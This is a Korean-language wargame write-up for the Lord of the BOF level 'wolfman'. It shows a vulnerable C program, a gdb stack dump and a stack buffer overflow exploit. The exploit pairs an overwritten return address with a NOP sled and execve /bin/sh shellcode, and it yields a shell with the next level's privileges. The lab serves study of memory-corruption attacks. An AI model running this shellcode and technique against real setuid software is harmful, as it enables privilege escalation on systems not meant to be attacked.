LOB orc => wolfman
문제
[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
[orc@localhost orc]$ goblin 때와 같은 소스 코드이지만 이번엔 buffer도 사용한 뒤 비워버리기 때문에 리턴 어드레스로 버퍼로 변조하여 쉘을 따는 것을 못하게 막아두었다.
취약점
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}strcpy()함수를 통해 인자를 받아오는데 제한이 없어 buffer를 넘어 메모리를 변조할 수 있다.
풀이
(gdb) b*main
Breakpoint 1 at 0x8048500
(gdb) r `python -c "print 'A'*47 + '\xbf'"`
Starting program: /home/orc/tmp/wolfman `python -c "print 'A'*47 + '\xbf'"`
Breakpoint 1, 0x8048500 in main ()
(gdb) x/100x $ebp-500
0xbffff904: 0x00000000 0x40013a08 0x40013a00 0x400139d8
--- 생략 ---
(gdb)
0xbffffc24: 0x6d666c6f 0x41006e61 0x41414141 0x41414141
0xbffffc34: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc44: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc54: 0x41414141 0x00bf4141 0x5353454c 0x4e45504f
0xbffffc64: 0x752f7c3d 0x622f7273 0x6c2f6e69 0x70737365
0xbffffc74: 0x2e657069 0x25206873 0x53550073 0x414e5245
0xbffffc84: 0x003d454d 0x54534948 0x455a4953 0x3030313d
0xbffffc94: 0x4f480030 0x414e5453 0x6c3d454d 0x6c61636f
0xbffffca4: 0x74736f68 0x636f6c2e 0x6f646c61 0x6e69616d
0xbffffcb4: 0x474f4c00 0x454d414e 0x63726f3d 0x4d455200
0xbffffcc4: 0x4845544f 0x3d54534f 0x2e323931 0x2e383631
0xbffffcd4: 0x2e333931 0x414d0031 0x2f3d4c49 0x2f726176
0xbffffce4: 0x6f6f7073 0x616d2f6c 0x6f2f6c69 0x4d006372
0xbffffcf4: 0x54484341 0x3d455059 0x36383369 0x6465722d
0xbffffd04: 0x2d746168 0x756e696c 0x6e672d78 0x45540075
0xbffffd14: 0x783d4d52 0x6d726574 0x534f4800 0x50595454
0xbffffd24: 0x33693d45 0x50003638 0x3d485441 0x7273752f
0xbffffd34: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962
0xbffffd44: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72
0xbffffd54: 0x2f365231 0x3a6e6962 0x6d6f682f 0x726f2f65
0xbffffd64: 0x69622f63 0x4c4f006e 0x44575044 0x6f682f3d
0xbffffd74: 0x6f2f656d 0x48006372 0x3d454d4f 0x6d6f682f
0xbffffd84: 0x726f2f65 0x4e490063 0x52545550 0x652f3d43
0xbffffd94: 0x692f6374 0x7475706e 0x53006372 0x4c4c4548
0xbffffda4: 0x69622f3d 0x61622f6e 0x55006873 0x3d524553이번에는 argv[1]에 먼저 인자가 들어가고 buffer에 인자를 옮기는 것을 인식하고 buffer로 리턴어드레스를 변조하는 것이 아닌 argv[1]에서 변조한 리턴 어드레스 뒤에 쉘코드를 더하여 그곳으로 리턴 어드레스를 조작할 예정이다. 따라서 쉘코드가 들어갈 위치이면서 변조할 리턴 어드레스 주소는 A가 끝나는 주소에서 4byte를 더한 0xbffffc5a이다.
[orc@localhost tmp]$ ./wolfman `python -c "print 'A'*44 + '\x5a\xfc\xff\xbf' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZ??픐h//shh/bin??S??째
?
Segmentation fault (core dumped)
[orc@localhost tmp]$ gdb -c core얼라리? 그런데 Segmentation fault가 떳다. core파일을 분석해보자.
(gdb) x/100x $ebp-500
0xbffff904: 0x00000000 0x40013a08 0x40013a00 0x400139d8
--- 생략 ---
(gdb)
0xbffffc24: 0x6d666c6f 0x41006e61 0x41414141 0x41414141
0xbffffc34: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc44: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc54: 0x41414141 0x00bf4141 0x5353454c 0x4e45504f
0xbffffc64: 0x752f7c3d 0x622f7273 0x6c2f6e69 0x70737365
0xbffffc74: 0x2e657069 0x25206873 0x53550073 0x414e5245
0xbffffc84: 0x003d454d 0x54534948 0x455a4953 0x3030313d
0xbffffc94: 0x4f480030 0x414e5453 0x6c3d454d 0x6c61636f
0xbffffca4: 0x74736f68 0x636f6c2e 0x6f646c61 0x6e69616d
0xbffffcb4: 0x474f4c00 0x454d414e 0x63726f3d 0x4d455200
0xbffffcc4: 0x4845544f 0x3d54534f 0x2e323931 0x2e383631
0xbffffcd4: 0x2e333931 0x414d0031 0x2f3d4c49 0x2f726176
0xbffffce4: 0x6f6f7073 0x616d2f6c 0x6f2f6c69 0x4d006372
0xbffffcf4: 0x54484341 0x3d455059 0x36383369 0x6465722d
0xbffffd04: 0x2d746168 0x756e696c 0x6e672d78 0x45540075
0xbffffd14: 0x783d4d52 0x6d726574 0x534f4800 0x50595454
0xbffffd24: 0x33693d45 0x50003638 0x3d485441 0x7273752f
0xbffffd34: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962
0xbffffd44: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72
0xbffffd54: 0x2f365231 0x3a6e6962 0x6d6f682f 0x726f2f65
0xbffffd64: 0x69622f63 0x4c4f006e 0x44575044 0x6f682f3d
0xbffffd74: 0x6f2f656d 0x48006372 0x3d454d4f 0x6d6f682f
0xbffffd84: 0x726f2f65 0x4e490063 0x52545550 0x652f3d43
0xbffffd94: 0x692f6374 0x7475706e 0x53006372 0x4c4c4548
0xbffffda4: 0x69622f3d 0x61622f6e 0x55006873 0x3d524553[orc@localhost tmp]$ ./wolfman `python -c "print 'A'*44 + '\x52\xfc\xff\xbf' + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#??픐h//shh/bin??S??째
?
Illegal instruction (core dumped)음...? 에러가 난다.... 혹시 몰라서 nop을 껴주었더니 제대로 쉘이 따졌다.
[orc@localhost orc]$ ./wolfman `python -c "print 'A'*44 + '\x52\xfc\xff\xbf' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR?퓧???????????????????????????????????????????????????????????????????????????????????????????????????1픐h//shh/bin??S??째
?
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$